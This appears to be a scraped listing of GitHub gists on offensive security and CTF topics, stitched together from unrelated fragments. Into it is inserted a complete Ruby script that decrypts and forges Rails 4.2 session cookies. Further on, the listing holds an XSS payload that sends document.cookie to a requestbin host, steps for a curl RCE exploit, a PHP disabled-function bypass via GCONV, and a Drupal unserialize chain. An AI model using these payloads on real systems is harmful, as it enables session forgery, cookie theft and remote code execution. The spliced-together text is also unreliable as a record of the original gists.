{{1+1}} wupco
@JoshCheek
JoshCheek / Readme.md
Last active June 20, 2018 07:55
Decrypting a Rails (v4.2.0) session

How to get the values

Salts

$ rails runner 'Rails.application.config.action_dispatch.tap { |c| p encrypted_cookie_salt: c.encrypted_cookie_salt, encrypted_signed_cookie_salt: c.encrypted_signed_cookie_salt }'

Secret Key Base
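
The preview is cut off here, so the full decryption procedure follows as an added example; it is not part of JoshCheek's gist. It assumes the Rails 4.2 default salts ('encrypted cookie' and 'signed encrypted cookie'), the :json cookies_serializer, and a made-up secret_key_base; in a real app the secret comes from config/secrets.yml and the salts from the rails runner command above. The encrypt routine is included only so the demo can mint its own cookie offline.

```ruby
require 'openssl'
require 'base64'
require 'json'
require 'cgi'

# Constructed values for the demo. The two salts are the Rails 4.2 defaults;
# the secret is a made-up 128-character hex string.
SECRET_KEY_BASE = '3f1c' * 32
ENCRYPTED_COOKIE_SALT = 'encrypted cookie'
ENCRYPTED_SIGNED_COOKIE_SALT = 'signed encrypted cookie'
KEY_ITERATIONS = 1000 # ActiveSupport::KeyGenerator iterations used for cookie keys

# ActiveSupport::KeyGenerator#generate_key: PBKDF2-HMAC-SHA1 over secret_key_base.
def derive_key(secret_key_base, salt, size = 64)
  OpenSSL::PKCS5.pbkdf2_hmac(secret_key_base, salt, KEY_ITERATIONS, size, OpenSSL::Digest.new('SHA1'))
end

# Rails 4.2 derives 64 bytes for both keys. AES-256-CBC takes only 32, and the
# OpenSSL bindings of that era silently used the first 32 bytes, so the effective
# cipher key is the 32-byte prefix (PBKDF2 output is prefix-stable, so this equals
# a direct 32-byte derivation). The HMAC key keeps all 64 bytes.
def cookie_keys(secret_key_base, enc_salt, sig_salt)
  [derive_key(secret_key_base, enc_salt)[0, 32], derive_key(secret_key_base, sig_salt)]
end

def hmac_sha1_hex(key, data)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), key, data)
end

# Constant-time comparison, as ActiveSupport::SecurityUtils.secure_compare does.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Decrypt a session cookie value exactly as the browser sends it (URL-escaped).
# Layout: url_escape( base64( base64(ciphertext) "--" base64(iv) ) "--" hex_hmac_sha1 )
def decrypt_session(cookie_value, secret_key_base, enc_salt:, sig_salt:)
  aes_key, hmac_key = cookie_keys(secret_key_base, enc_salt, sig_salt)
  data, digest = CGI.unescape(cookie_value).split('--', 2)
  raise 'malformed cookie' if data.nil? || digest.nil?
  # Verify before touching the ciphertext; Rails discards the cookie on mismatch.
  raise 'bad signature' unless secure_compare(digest, hmac_sha1_hex(hmac_key, data))
  ct_b64, iv_b64 = Base64.strict_decode64(data).split('--', 2)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = aes_key
  cipher.iv = Base64.strict_decode64(iv_b64)
  plain = cipher.update(Base64.strict_decode64(ct_b64)) + cipher.final
  # :json is the 4.1+ default for new apps; an upgraded app on :marshal would
  # call Marshal.load(plain) here instead.
  JSON.parse(plain.force_encoding('UTF-8'))
end

# The inverse, mirroring MessageEncryptor#encrypt_and_sign, so the demo can mint
# its own cookie (and so a leaked secret lets you forge one).
def encrypt_session(session, secret_key_base, enc_salt:, sig_salt:)
  aes_key, hmac_key = cookie_keys(secret_key_base, enc_salt, sig_salt)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt
  cipher.key = aes_key
  iv = cipher.random_iv
  ct = cipher.update(JSON.generate(session)) + cipher.final
  inner = [ct, iv].map { |v| Base64.strict_encode64(v) }.join('--')
  data = Base64.strict_encode64(inner)
  CGI.escape("#{data}--#{hmac_sha1_hex(hmac_key, data)}")
end

# Flip one character of the signed payload and confirm that the signature check,
# not the cipher, is what rejects it.
def tampered_cookie_rejected?(cookie_value, secret_key_base, enc_salt:, sig_salt:)
  data, digest = CGI.unescape(cookie_value).split('--', 2)
  data = data.dup
  data[0] = data[0] == 'A' ? 'B' : 'A'
  decrypt_session(CGI.escape("#{data}--#{digest}"), secret_key_base, enc_salt: enc_salt, sig_salt: sig_salt)
  false
rescue RuntimeError => e
  e.message == 'bad signature'
end

if $PROGRAM_NAME == __FILE__
  cookie = encrypt_session({ 'session_id' => 'c0ffee', 'user_id' => 42 }, SECRET_KEY_BASE,
                           enc_salt: ENCRYPTED_COOKIE_SALT, sig_salt: ENCRYPTED_SIGNED_COOKIE_SALT)
  p decrypt_session(cookie, SECRET_KEY_BASE, enc_salt: ENCRYPTED_COOKIE_SALT, sig_salt: ENCRYPTED_SIGNED_COOKIE_SALT)
end
```

Two things worth keeping in mind when using this against a real cookie: the HMAC is checked over the outer base64 string before any decryption, so a wrong secret or salt shows up as 'bad signature' rather than a padding error; and because the same secret_key_base both signs and encrypts, anyone holding it can forge cookies, which on an app still using the :marshal serializer means the server will Marshal.load attacker-chosen objects.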

@frohoff
frohoff / JAVA-ADVISORY.md
Last active August 28, 2023 19:08
Java 7u21 Security Advisory

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
@jcreedcmu
jcreedcmu / escape.js
Created February 19, 2018 18:09
Escaping nodejs vm
////////
// The vm module lets you run a string containing javascript code 'in
// a sandbox', where you specify a context of global variables that
// exist for the duration of its execution. This works more or less
// well, and if you're in control of the code that's running, and you
// have a reasonable protocol in mind for how it expects a certain
// context to exist and interacts with it --- like, maybe a plug-in
// API for a program, with some endpoints defined for it that do
// useful domain-specific things --- your life can go smoothly.
<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">
@paul-axe
paul-axe / insomnihack2019teaser_droops_writeup.md
Created January 20, 2019 12:42
insomnihack2019teaser_droops_writeup.md

The challenge was based on Drupal 7 with an obvious unserialize call added.

Trying to build a chain, the first solution I found was based on the following chain:

./includes/bootstrap.inc

abstract class DrupalCacheArray
    ...
    public function __destruct() {
        $data = array();
@PaulCher
PaulCher / _readme.md
Last active July 23, 2023 15:01
curl 1-day exploit
  1. Confirm that you have an unpatched version of libcurl, one that still contains CVE-2019-5482
  2. Update the IP addresses in the source files
  3. Launch srv.py on the server
  4. Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'
@LoadLow
LoadLow / Readme.md
Last active August 14, 2023 13:55
Bypass shell_exec or system disabled functions by using GCONV (PHP rce to system())

This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

Credits: @hugeh0ge

It uses PHP's iconv() to execute the same payload.

Use cases:

  • You control the first parameter of iconv() (in_charset), you can set an environment variable, and you can upload arbitrary files (the .so library and the gconv-modules file) to a path you know.
  • You have PHP RCE but system, shell_exec, curl_exec and other functions are disabled; you can still set environment variables, and LD_PRELOAD is blacklisted.
@random-robbie
random-robbie / shell_exec.txt
Created March 25, 2020 14:20
WordPress plugins with shell_exec in them.
10web-manager
4k-icon-fonts-for-visual-composer
accelerated-mobile-pages
accept-payments-wp
accu-auto-backup
ace-edit
ace-editor-for-wp
aceide
acelerator
acf-code-field
@shinh
shinh / gen_el_lua_py2_jvm.rb
Last active December 26, 2020 18:15
bytecode polyglot - def con qual 2020 bytecoooding
#!/usr/bin/env ruby
# elisp, lua, python2, and jvm
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/
$flag = File.read('flag').chomp
$ml_preamble = nil
$lua_preamble = nil
$ruby_preamble = nil
@birdg0
birdg0 / solve.c
Last active September 27, 2020 09:25
Official solution for "Shoplifters" of 0CTF/TCTF 2020 Finals
/*
gcc -m64 -nostdlib -Os -mrtm -fno-toplevel-reorder -static -Wno-multichar solve.c -o solve.elf
objcopy -Obinary -j .text solve.elf solve.bin
Reference https://github.com/Alberts-Coffee-Hours/Mastik/blob/master/src/l1.c,
https://github.com/vusec/ridl/blob/master/exploits/shadow/leak.c
and https://github.com/oranav/ctf-writeups/blob/master/gctf19/RIDL/solve.c
*/
#include <stdio.h>
#include <stdlib.h>